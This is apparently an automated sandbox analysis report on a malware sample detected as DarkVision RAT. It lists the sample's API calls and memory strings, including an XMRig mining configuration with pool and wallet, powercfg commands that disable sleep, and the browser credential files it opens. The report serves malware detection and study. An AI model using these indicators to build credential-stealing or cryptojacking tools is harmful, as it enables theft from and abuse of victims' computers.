                        Source: explorer.exe, 00000020.00000003.2475569173.0000000000739000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tfalyrob","computername":"648351","username":"648351","gpu":"M669LA8","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":1,"type":"xmrig","status":1}~P
                        Source: explorer.exe, 00000020.00000002.4653016535.000000000072C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3768851377.0000000000765000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3768750703.0000000000762000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager9w
                        Source: explorer.exe, 00000020.00000003.2475407656.0000000000739000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {"id":"omsihloywfalyrob","computername":"648351","username":"648351","gpu":"M669LA8","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":1,"type":"xmrig","status":1}
                        Source: explorer.exe, 00000020.00000003.2475407656.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2443389912.0000000000739000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a%p {"id":"omsihloywfalyrob","computername":"648351","username":"648351","gpu":"M669LA8","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":1,"type":"xmrig","status":1}~P
                        Source: explorer.exe, 00000020.00000003.2475569173.0000000000739000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: yv`;tfalyrob","computername":"648351","username":"648351","gpu":"M669LA8","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":1,"type":"xmrig","status":1}
                        Source: explorer.exe, 00000020.00000003.2443507945.0000000000748000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzC:\Windows\explorer.exe - Program ManagerM@
                        Source: explorer.exe, 00000020.00000003.3768750703.0000000000785000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {"id":"omsihloywfalyrob","computername":"648351","username":"648351","gpu":"M669LA8","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":120,"type":"xmrig","pool":"pool.hashvault.pro","port":3333,"algo":"rx/0","worker":"","password":"","user":"46YsJeNg78AFeAsVAS8AGTD5nfNhSfrqNALiwpnJhBkXcgRggpykaKZYjp3YSwYRD2A1cEHqqkuqDKHXWj4XSVjxG8asejB","hashrate":602.4033437826541,"status":2}t
                        Source: C:\Users\user\Desktop\file.exeCode function: OpenEventW,OpenMutexW,OpenMutexW,WaitForSingleObject,CreateEventW,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,Sleep,WaitForSingleObject,WaitForSingleObject,setsockopt,CreateEventW,LocalAlloc,CreateThread,GetTickCount,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,___crtGetLocaleInfoEx,WSAGetLastError,GetTickCount,GetTickCount,___crtGetLocaleInfoEx,Sleep,shutdown,closesocket,SetEvent,WaitForSingleObject,CloseHandle,LocalFree,CloseHandle,shutdown,closesocket,CloseHandle,ExitProcess,WaitForSingleObject,WaitForSingleObject,SetEvent,WaitForSingleObject,CloseHandle,CloseHandle,CloseHandle,ReleaseMutex,CloseHandle,CloseHandle,CloseHandle,0_2_007E1030
                        Source: C:\Users\user\Desktop\file.exeCode function: setsockopt,___crtGetLocaleInfoEx,closesocket,0_2_007D70F2
                        Source: C:\Users\user\Desktop\file.exeCode function: setsockopt,___crtGetLocaleInfoEx,closesocket,0_2_007D70D9
                        Source: C:\Users\user\Desktop\file.exeCode function: ___crtGetLocaleInfoEx,WSACreateEvent,WaitForSingleObject,___crtGetLocaleInfoEx,WaitForSingleObject,WSAGetLastError,WSAEventSelect,WSAWaitForMultipleEvents,WaitForSingleObject,WSAEnumNetworkEvents,CloseHandle,0_2_007E0950
                        Source: C:\Users\user\Desktop\file.exeCode function: LocalAlloc,und_memcpy,CreateEventW,wsprintfW,GetForegroundWindow,SetWindowTextW,WSAEventSelect,WSAWaitForMultipleEvents,LocalFree,CloseHandle,LocalFree,CloseHandle,___crtGetLocaleInfoEx,LocalFree,CloseHandle,LocalFree,CloseHandle,CloseHandle,LocalFree,0_2_007DF9E0
                        Source: C:\Users\user\Desktop\file.exeCode function: LocalAlloc,und_memcpy,CreateEventW,WSAEventSelect,WSAWaitForMultipleEvents,LocalFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CloseHandle,___crtGetLocaleInfoEx,WSAGetLastError,LocalFree,CloseHandle,CloseHandle,LocalFree,0_2_007DFC10
                        Source: C:\Users\user\Desktop\file.exeCode function: LocalAlloc,htons,___crtGetLocaleInfoEx,___crtGetLocaleInfoEx,und_memcpy,LocalFree,LocalFree,0_2_007E04F0
                        Source: C:\Users\user\Desktop\file.exeCode function: ___crtGetLocaleInfoEx,WSACreateEvent,WaitForSingleObject,___crtGetLocaleInfoEx,WaitForSingleObject,WSAGetLastError,WSAEventSelect,WSAWaitForMultipleEvents,WaitForSingleObject,WSAEnumNetworkEvents,CloseHandle,0_2_007E0CD0
                        Source: C:\Users\user\Desktop\file.exeCode function: CloseHandle,CloseHandle,CreateEventW,CreateThread,ResumeThread,CloseHandle,CloseHandle,WaitForSingleObject,CloseHandle,CloseHandle,CreateEventW,CreateThread,ResumeThread,CloseHandle,CloseHandle,setsockopt,___crtGetLocaleInfoEx,closesocket,setsockopt,___crtGetLocaleInfoEx,closesocket,CloseHandle,CloseHandle,CreateEventW,CreateThread,ResumeThread,CloseHandle,CloseHandle,WaitForSingleObject,CloseHandle,CloseHandle,CreateEventW,CreateThread,ResumeThread,CloseHandle,CloseHandle,___crtGetLocaleInfoEx,closesocket,0_2_007D6D30
                        Source: C:\Users\user\Desktop\file.exeCode function: LocalAlloc,htons,wsprintfA,___crtGetLocaleInfoEx,___crtGetLocaleInfoEx,und_memcpy,LocalFree,LocalFree,0_2_007E0630
                        Source: C:\Users\user\Desktop\file.exeCode function: LocalAlloc,und_memcpy,CreateEventW,WSAEventSelect,WSAWaitForMultipleEvents,LocalFree,CloseHandle,LocalFree,CloseHandle,___crtGetLocaleInfoEx,WSAGetLastError,LocalFree,CloseHandle,CloseHandle,LocalFree,0_2_007DFE10
                        Source: C:\Users\user\Desktop\file.exeCode function: ___crtGetLocaleInfoEx,0_2_007DF690
                        Source: C:\Users\user\Desktop\file.exeCode function: ___crtGetLocaleInfoEx,0_2_007DF730
                        Source: C:\Users\user\Desktop\file.exeCode function: LocalAlloc,und_memcpy,CreateEventW,WSAEventSelect,WSAWaitForMultipleEvents,LocalFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CloseHandle,___crtGetLocaleInfoEx,LocalFree,CloseHandle,LocalFree,CloseHandle,CloseHandle,LocalFree,0_2_007DF7D0
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D41E0 __snwprintf,RegCreateKeyExW,RegCloseKey,_memset,GetSystemTime,SystemTimeToFileTime,0_2_007D41E0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E2530 LocalAlloc,LoadLibraryW,LocalFree,GetProcAddress,LocalFree,_memset,LocalFree,GetUserGeoID,gethostname,gethostbyname,GetComputerNameExW,GetUserNameW,GetTickCount64,LocalFree,0_2_007E2530
                        Source: C:\Windows\explorer.exeCode function: 33_2_0145A674 _lock,_get_daylight,_get_daylight,_get_daylight,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,33_2_0145A674
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007DC090 GetModuleHandleA,GetProcAddress,RtlGetVersion,0_2_007DC090
                        Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Lowering of HIPS / PFW / Operating System Security Settings

                        barindex
                        Modifies power options to not sleep / hibernate
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
                        Source: explorer.exe, 00000020.00000003.2475407656.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3390824384.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2443389912.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.4653016535.000000000072C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2475569173.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3768529697.000000000072C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe

                        Stealing of Sensitive Information

                        barindex
                        Yara detected DarkVision Rat
                        Source: Yara matchFile source: file.exe, type: SAMPLE
                        Source: Yara matchFile source: 4.2.explorer.exe.be0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.file.exe.7c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.7c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000000.2115394584.00000000007F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.2116236371.0000000002801000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2119261652.0000000002800000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: file.exe PID: 4152, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5020, type: MEMORYSTR
                        Contains functionality to steal Chrome passwords or cookies
                        Source: C:\Windows\explorer.exeCode function: ENCWCHAR \Google\Chrome\User Data\Default\Login Data33_2_013940D0
                        Source: C:\Windows\explorer.exeCode function: ENCWCHAR \Google\Chrome\User Data\Default\Login Data35_2_027B40D0
                        Source: C:\Windows\explorer.exeCode function: ENCWCHAR \Google\Chrome\User Data\Default\Login Data36_2_029F40D0
                        Contains functionality to steal saved passwords of Firefox
                        Source: C:\Windows\explorer.exeCode function: LocalAlloc,LocalAlloc,LocalAlloc,SHGetKnownFolderPath,LocalAlloc,LocalAlloc,GetPrivateProfileStringW,LocalAlloc,_snprintf,LocalAlloc,_snprintf,CreateFileA,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,CoTaskMemFree,LocalFree,LocalFree,LocalFree, encryptedPassword33_2_0139AF00
                        Source: C:\Windows\explorer.exeCode function: LocalAlloc,LocalAlloc,LocalAlloc,SHGetKnownFolderPath,LocalAlloc,LocalAlloc,GetPrivateProfileStringW,LocalAlloc,_snprintf,LocalAlloc,_snprintf,CreateFileA,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,CoTaskMemFree,LocalFree,LocalFree,LocalFree, encryptedPassword33_2_0139AF00
                        Source: C:\Windows\explorer.exeCode function: LocalAlloc,LocalAlloc,LocalAlloc,SHGetKnownFolderPath,LocalAlloc,LocalAlloc,GetPrivateProfileStringW,LocalAlloc,_snprintf,LocalAlloc,_snprintf,CreateFileA,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,CoTaskMemFree,LocalFree,LocalFree,LocalFree, encryptedPassword33_2_0139AF00
                        Source: C:\Windows\explorer.exeCode function: LocalAlloc,LocalAlloc,LocalAlloc,SHGetKnownFolderPath,LocalAlloc,LocalAlloc,GetPrivateProfileStringW,LocalAlloc,_snprintf,LocalAlloc,_snprintf,CreateFileA,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,CoTaskMemFree,LocalFree,LocalFree,LocalFree, encryptedPassword35_2_027BAF00
                        Source: C:\Windows\explorer.exeCode function: LocalAlloc,LocalAlloc,LocalAlloc,SHGetKnownFolderPath,LocalAlloc,LocalAlloc,GetPrivateProfileStringW,LocalAlloc,_snprintf,LocalAlloc,_snprintf,CreateFileA,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,CoTaskMemFree,LocalFree,LocalFree,LocalFree, encryptedPassword35_2_027BAF00
                        Source: C:\Windows\explorer.exeCode function: LocalAlloc,LocalAlloc,LocalAlloc,SHGetKnownFolderPath,LocalAlloc,LocalAlloc,GetPrivateProfileStringW,LocalAlloc,_snprintf,LocalAlloc,_snprintf,CreateFileA,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,CoTaskMemFree,LocalFree,LocalFree,LocalFree, encryptedPassword35_2_027BAF00
                        Source: C:\Windows\explorer.exeCode function: LocalAlloc,LocalAlloc,LocalAlloc,SHGetKnownFolderPath,LocalAlloc,LocalAlloc,GetPrivateProfileStringW,LocalAlloc,_snprintf,LocalAlloc,_snprintf,CreateFileA,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,CoTaskMemFree,LocalFree,LocalFree,LocalFree, encryptedPassword36_2_029FAF00
                        Source: C:\Windows\explorer.exeCode function: LocalAlloc,LocalAlloc,LocalAlloc,SHGetKnownFolderPath,LocalAlloc,LocalAlloc,GetPrivateProfileStringW,LocalAlloc,_snprintf,LocalAlloc,_snprintf,CreateFileA,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,CoTaskMemFree,LocalFree,LocalFree,LocalFree, encryptedPassword36_2_029FAF00
                        Source: C:\Windows\explorer.exeCode function: LocalAlloc,LocalAlloc,LocalAlloc,SHGetKnownFolderPath,LocalAlloc,LocalAlloc,GetPrivateProfileStringW,LocalAlloc,_snprintf,LocalAlloc,_snprintf,CreateFileA,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,CoTaskMemFree,LocalFree,LocalFree,LocalFree, encryptedPassword36_2_029FAF00
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\pkcs11.txt
                        Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data
                        Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
                        Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\pkcs11.txt
                        Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                        Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
                        Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Login Data
                        Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
                        Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

                        Remote Access Functionality

                        barindex
                        Yara detected DarkVision Rat
                        Source: Yara matchFile source: file.exe, type: SAMPLE
                        Source: Yara matchFile source: 4.2.explorer.exe.be0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.file.exe.7c0000.0.unpack, type: UNPACKEDPE
